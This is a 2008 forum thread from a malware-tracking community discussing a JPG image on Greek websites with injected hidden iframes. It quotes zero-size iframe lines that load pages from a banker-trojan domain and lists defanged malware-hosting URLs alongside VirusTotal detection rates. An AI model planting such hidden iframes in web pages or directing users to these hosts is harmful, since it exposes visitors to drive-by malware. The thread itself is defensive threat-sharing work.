Malware Domain List

Malware Related => Malicious Domains => Topic started by: sowhat-x on August 03, 2008, 11:13:36 pm

Title: W32/JPGiframer
Post by: sowhat-x on August 03, 2008, 11:13:36 pm
What the heck...thought I'd finally plan my summer vacation,yet again...
seems that not even that can take place nowadays,without stumbling across newer malware attacks...
Have 'fun' looking at this:

Quote
hxxp://www.xenonaskazakou.gr/
Now check out the jpg image in the homepage... ;)
(Also added as an attachment...pass is "infected")
Detection rate...8/36 (22.23%)
http://www.virustotal.com/analisis/063dcf189bdaf5a42378ec3c5c3a82af

Quote
<iframe src=hxxp://www.goldwindos2000.com/xiaoaone/index.htm widht=0 height=0></iframe>
<iframe src=hxxp://www.goldwindos2000.com/hkeraone/hker.htm widht=0 height=0></iframe>
<iframe src=hxxp://www.goldwindos2000.com/xiaoaone/index.htm widht=0 height=0></iframe>

The injected goldwindos2000 domain is already in the list since late January.
Google revealed also the following ThreatExpert report from that time...Trojan-Spy.Banker.CCB:
http://www.threatexpert.com/report.aspx?uid=d399f86f-b341-4e1c-9a9c-822659b7721f
As with most malware nowadays,it's all about the money...
Title: Re: W32/JPGiframer
Post by: pcaccent on August 04, 2008, 01:10:35 am
very interesting...
Title: Re: W32/JPGiframer
Post by: tjs on August 04, 2008, 07:24:57 am
Hmm, so i've been digging into this and reading JPG file format specs..

I noticed the string 'ducky' in the JFIF header and thought it might be a clue. It's not. This string is automatically added by Adobe Photoshop (so we know they used that to create the image).

I have a feeling that this might be the work of a file infector that targets files in the httpd directory... I've been unable to make this 'attack' work in a browser or email client so far... has anyone else had any luck?

TJS
Title: Re: W32/JPGiframer
Post by: Serg on August 04, 2008, 01:10:46 pm
"it's all about the money..."
E... but this iframe doesn't work)
Title: Re: W32/JPGiframer
Post by: sowhat-x on August 04, 2008, 02:44:07 pm
Quote
... but this iframe doesn't work
Yeap,at the current moment,at least the referenced iframe link to goldwindos2000.com appears "inactive",
but this doesn't really mean a thing,that's why I referenced the ThreatExpert report...  ;)

I believe these lamers are currently in early stages of experimenting/searching new injection techniques,
so I wouldn't really concentrate much on the domain itself...
but more on which browser/web app might be vulnerable out there...
Title: Re: W32/JPGiframer
Post by: sowhat-x on August 04, 2008, 03:01:15 pm
Heh,here we go - mystery solved (at least for the most part of it...)  :)
http://blog.scansafe.com/journal/2008/7/6/june-a-month-of-new-image-exploits.html
Plus...
http://www.viruslist.com/en/weblog?weblogid=208187540

And one more sample that I've digged while searching around...
Quote
hxxp://www.spinoza.gr/Images/home.gif
Title: Re: W32/JPGiframer
Post by: JohnC on August 07, 2008, 05:24:57 pm
Thanks.
Title: Re: W32/JPGiframer
Post by: sowhat-x on November 15, 2008, 03:58:04 pm
Quote
hxxp://ly.wj.js.cn/Uppic/logo/2008724102151.gif
Result: 4/36 (11.12%)
http://www.virustotal.com/analisis/446dc2fe3c0aee3bc2d4888dbf284b1f